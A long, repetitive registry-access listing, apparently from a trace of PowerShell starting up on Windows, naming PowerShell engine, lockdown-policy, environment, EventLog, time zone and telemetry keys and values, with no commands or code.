MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack
HKEY_LOCAL_MACHINE
DiagTrackAuthorization
DiagTrackAuthorization
0
REG_DWORD_LITTLE_ENDIAN
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
